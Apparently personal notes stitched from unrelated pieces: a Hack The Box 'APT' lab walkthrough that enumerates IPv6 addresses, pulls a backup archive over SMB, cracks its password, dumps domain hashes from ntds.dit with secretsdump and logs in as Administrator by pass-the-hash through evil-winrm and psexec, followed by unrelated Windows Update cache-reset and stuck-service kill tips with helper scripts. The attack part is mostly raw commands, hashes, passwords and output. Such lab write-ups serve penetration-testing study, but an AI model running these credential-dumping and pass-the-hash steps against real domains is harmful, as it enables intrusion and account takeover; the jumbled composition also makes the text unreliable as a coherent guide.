htb-apt-nl


I used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py

Reference used:

The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication

┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p '!!!watermelon245'


$nmap -6 -sV dead:beef::b885:d62a:d679:573f
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.026s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds

evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#Ny5@2dvht'

1) get the IPv6 address
2) smbclient: connect to it and get backup.zip
3) crack the zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dit
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt

┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 .
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw-   10650961  Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $zip2john backup.zip > encrypted.hash$
backup.zip/Active Directory/ is not encrypted!
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit 
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up... 

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e

evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2

 

Thus:

1st: add the IPv6 address to /etc/hosts !!!!!
dead:beef::b885:d62a:d679:573f apt.htb htb.local

2nd

┌─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm
Enter Password:G1#Ny5@2dvh

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls


Directory: C:\Users\henry.vinson_adm\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/25/2021 11:53 AM 12674 Powerless.bat


*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat
Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat


Info: Download successful!

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

3rd

┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
henry.vinson henry.vinson_adm krbtgt
The command completed with one or more errors.


*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir

Directory: C:\Users\Administrator

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/24/2020 9:12 AM Contacts
d-r--- 10/23/2020 10:59 AM Desktop
d-r--- 9/24/2020 9:12 AM Documents
d-r--- 9/24/2020 9:12 AM Downloads
d-r--- 9/24/2020 9:12 AM Favorites
d-r--- 9/24/2020 9:12 AM Links
d-r--- 9/24/2020 9:12 AM Music
d-r--- 9/24/2020 9:12 AM Pictures
d-r--- 9/24/2020 9:12 AM Saved Games
d-r--- 9/24/2020 9:12 AM Searches
d-r--- 9/24/2020 9:12 AM Videos

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/4/2020 1:22 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0ca97e04be5679529b87cc2a2de98782
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users\> dir
Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 7:54 AM Administrator
d----- 9/24/2020 8:39 AM henry.vinson
d----- 9/24/2020 8:40 AM henry.vinson_adm
d-r--- 11/21/2016 2:39 AM Public

*Evil-WinRM* PS C:\Users> cd henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt
e1e73b8410cf060794a86e7f6a753f83
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>
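
The URI::InvalidURIError above, which the /etc/hosts entry works around, is an IPv6 formatting problem rather than a connectivity one. The following Python, added here as an example and not taken from evil-winrm or the original notes, builds WS-Man endpoint URLs that bracket IPv6 literals as RFC 3986 requires, checks whether a given URL parses at all, and converts resolver-style `Address:` lines (a constructed sample using documentation addresses) into usable endpoints. The `wsman_url` and `endpoints_from_resolver_output` names are this example's own.

```python
"""Build well-formed WS-Management (WinRM) endpoint URLs for IPv4, IPv6
and hostnames.

Added example; this is not evil-winrm's own code. It illustrates the
URI::InvalidURIError above: RFC 3986 requires an IPv6 literal in the
authority of a URL to be wrapped in square brackets, so
http://dead:beef::1:5985/wsman is ambiguous (which colon starts the
port?) while http://[dead:beef::1]:5985/wsman parses cleanly. The
resolver-style sample below is constructed; the addresses are not live.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed sample in the "Address: ..." format printed by IOXIDresolver.py
SAMPLE_RESOLVER_OUTPUT = """\
[*] Retrieving network interface of 192.0.2.10
Address: apt
Address: 192.0.2.10
Address: 2001:db8::b885:d62a:d679:573f
"""


def wsman_url(host, port=None, ssl=False, path="/wsman"):
    """Return the WS-Man URL for host; IPv6 literals are bracketed."""
    scheme = "https" if ssl else "http"
    if port is None:
        port = 5986 if ssl else 5985      # WinRM defaults: 5985 HTTP, 5986 HTTPS
    host = host.strip()
    if host.startswith("[") and host.endswith("]"):
        authority = host                  # caller already bracketed it
    else:
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            authority = host              # a DNS name such as htb.local
        else:
            authority = f"[{host}]" if addr.version == 6 else host
    return f"{scheme}://{authority}:{port}{path}"


def is_well_formed(url):
    """True if a standard URL parser recovers both a host and a port."""
    try:
        parts = urlsplit(url)
        return parts.hostname is not None and parts.port is not None
    except ValueError:                    # e.g. the unbracketed-IPv6 case
        return False


def endpoints_from_resolver_output(text):
    """Turn 'Address: ...' lines into a list of (address, url) pairs."""
    endpoints = []
    for line in text.splitlines():
        if line.startswith("Address:"):
            address = line.split(":", 1)[1].strip()
            endpoints.append((address, wsman_url(address)))
    return endpoints


if __name__ == "__main__":
    bad = "http://dead:beef::b885:d62a:d679:573f:5985/wsman"
    print(bad, "well-formed:", is_well_formed(bad))
    for address, url in endpoints_from_resolver_output(SAMPLE_RESOLVER_OUTPUT):
        print(f"{address:40} -> {url}  well-formed: {is_well_formed(url)}")
```

The same rule applies to any client that takes a raw host string (WinRM, LDAP, HTTP APIs): either bracket IPv6 literals before building the URL or resolve them through a name, which is exactly what the /etc/hosts workaround does.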
E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on apt.htb.....
[-] share 'backup' is not writable.
[*] Found writable share NETLOGON
[*] Uploading file RJdJAMfb.exe
[*] Opening SVCManager on apt.htb.....
[*] Creating service kOFV on apt.htb.....
[*] Starting service kOFV.....


windows-update-clear-update-cache

I recently had a Windows 2016 server that could not install automatic updates. It always hung at some percentage and never finished. The next step was to try to install an update (.msu file) manually, but this always hung forever at “Copying packages to the update cache”.

Here is what helped me:

Start a cmd box as Administrator

Run the following commands:

net stop wuauserv 
net stop cryptSvc 
net stop bits 
net stop msiserver 

del /f /q "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr*.dat" 
del /f /s /q %SystemRoot%\SoftwareDistribution\*.*  
del /f /s /q %SystemRoot%\system32\catroot2\*.* 
del /f /q %SystemRoot%\WindowsUpdate.log

net start wuauserv 
net start cryptSvc 
net start bits 
net start msiserver

This will clear the Windows Update cache and the automatic updates should work again.

How to Force Kill a Stuck Windows Service Using TaskKill?

The easiest way to stop a stuck service is to use the built-in taskkill command-line tool. First of all, you need to find the PID (process identifier) of the service. As an example, let’s take the Windows Update service. Its system name is wuauserv (you can check the name in the service properties in the services.msc console).

It is very common to see the Windows Modules Installer service hang when the server is restarted, especially after installing updates on Windows Server 2012 R2 and 2016.
Important. Be attentive. Forced termination of critical Windows services can result in BSOD or an unexpected system restart.

Run this command in an elevated command prompt (this is important, otherwise an access denied error will appear):

sc queryex wuauserv

In our case, the PID of the wuauserv service is 9168.

To force kill the stuck process with PID 9168, run the command:

taskkill /PID 9168 /F

SUCCESS: The process with PID 9168 has been terminated.

This command will forcibly terminate the service process. Now you can start the service with the sc start servicename command or through the service management console.
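
As an added example (not from the original article), the following Python parses the `sc queryex` output format used in the step above and decides whether a force-kill applies: only for a service in a pending state with a non-zero PID. The sample output is constructed to match the wuauserv case; `9168` is the PID from the article, and the `parse_sc_queryex` and `kill_command` names are this example's own.

```python
"""Parse `sc queryex <service>` output and decide whether the service's
host process can be force-killed.

Added example, not part of the original article. `sc queryex` prints
KEY : VALUE pairs; SAMPLE_SC_OUTPUT is constructed to mirror what the
article describes for wuauserv stuck in STOP_PENDING (PID 9168 is the
value from the article, everything else is made up).
"""
import re

SAMPLE_SC_OUTPUT = """\
SERVICE_NAME: wuauserv
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 9168
        FLAGS              :
"""

# Service states in which the article's force-kill is the intended remedy.
PENDING_STATES = {"STOP_PENDING", "START_PENDING"}
KEY_VALUE = re.compile(r"^\s*([A-Z0-9_]+)\s*:\s*(.*)$")


def parse_sc_queryex(text):
    """Return a dict with service name, state, pid and whether the process is shared."""
    info = {"name": None, "state": None, "pid": None, "shared": False}
    for line in text.splitlines():
        m = KEY_VALUE.match(line)
        if not m:                          # e.g. the "(NOT_STOPPABLE, ...)" flag line
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "SERVICE_NAME":
            info["name"] = value
        elif key == "STATE":
            fields = value.split()         # "3  STOP_PENDING" -> ["3", "STOP_PENDING"]
            info["state"] = fields[1] if len(fields) > 1 else None
        elif key == "PID":
            info["pid"] = int(value) if value.isdigit() else None
        elif key == "TYPE":
            # 0x20 (WIN32_SHARE_PROCESS): the service may live in a shared svchost.exe
            info["shared"] = "SHARE_PROCESS" in value
    return info


def kill_command(info):
    """Return the taskkill argv for a stuck service, or None if killing is not appropriate."""
    if info["state"] not in PENDING_STATES:
        return None                        # running/stopped services: use sc stop / sc start
    if not info["pid"]:
        return None                        # PID 0: no process to kill (already gone)
    return ["taskkill", "/PID", str(info["pid"]), "/F"]


if __name__ == "__main__":
    svc = parse_sc_queryex(SAMPLE_SC_OUTPUT)
    print(svc)
    cmd = kill_command(svc)
    print(" ".join(cmd) if cmd else "nothing to kill")
    if svc["shared"] and cmd:
        print("warning: shared host process; other services in PID", svc["pid"], "will die too")
```

On a Windows host the same parser can be fed `subprocess.run(["sc", "queryex", name], capture_output=True, text=True).stdout`. The `shared` flag is the check worth keeping: when TYPE reports WIN32_SHARE_PROCESS, `taskkill /PID` may also terminate every other service hosted in that svchost.exe, which is the reason behind the BSOD/restart warning in the text.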

You can stop a hung service more elegantly without manually checking the PID of the service process. The taskkill tool has the /FI option, which allows you to use a filter to select the necessary services or processes. You can kill a specific service with the command:

taskkill /F /FI "SERVICES eq wuauserv"

Or you can skip the service name altogether and kill all services in a hung state with the command:

taskkill /F /FI "status eq not responding"

After that, the service that is stuck in the Stopping status should stop.

You can also use the taskkill utility to force stop the hang services on a remote computer:

taskkill /S mun-fs01 /F /FI "SERVICES eq wuauserv"

Force Stop a Stuck Windows Service with PowerShell

You can also use PowerShell to force the service to stop. Using the following command, you can get a list of services in the Stopping state:

Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'stop pending'}

Or in the Starting state:

Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'start pending'}

The Stop-Process cmdlet allows terminating the processes of all found services. The following PowerShell script will terminate all stuck service processes on Windows:

$Services = Get-WmiObject -Class win32_service -Filter "state = 'stop pending'"
if ($Services) {
    foreach ($service in $Services) {
        try {
            # -ErrorAction Stop turns a failed kill into a catchable exception
            Stop-Process -Id $service.processid -Force -PassThru -ErrorAction Stop
        }
        catch {
            # $($_.Exception.Message) is required: "$_.Exception.Message" would only expand $_
            Write-Warning -Message "Error. Error details: $($_.Exception.Message)"
        }
    }
}
else {
    Write-Output "No services with 'Stopping' status"
}

You must use the Get-CimInstance instead of the Get-WmiObject cmdlet in the new PowerShell Core 6.x/7.x. Replace the first command of the script with:

$Services = Get-CimInstance -Class win32_service | where-Object state -eq 'stop pending'


Method 2: Reset Windows update components.

Resetting the Windows Update components will fix corrupt Windows Update components and help you install the Windows updates. Follow the steps below to reset the Windows Update components manually:

  1. Press Windows Key + X on the keyboard and then select “Command Prompt (Admin)” from the menu.
  2. Stop the BITS, Cryptographic, MSI Installer and Windows Update services. To do this, type the following commands at the command prompt. Press the “ENTER” key after you type each command.
    • net stop wuauserv
    • net stop cryptSvc
    • net stop bits
    • net stop msiserver
  3. Now rename the SoftwareDistribution and Catroot2 folders. You can do this by typing the following commands in the Command Prompt. Press the “ENTER” key after you type each command.
    • ren C:\Windows\SoftwareDistribution SoftwareDistribution.old
    • ren C:\Windows\System32\catroot2 Catroot2.old
  4. Now restart the BITS, Cryptographic, MSI Installer and Windows Update services. Type the following commands in the Command Prompt for this. Press the ENTER key after you type each command.
    • net start wuauserv
    • net start cryptSvc
    • net start bits
    • net start msiserver
  5. Type Exit in the Command Prompt to close it.

Now you may try running the Windows Updates and check if the above steps resolve the issue.

For reference: https://support.microsoft.com/en-us/kb/971058

Disclaimer: Important. This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly.
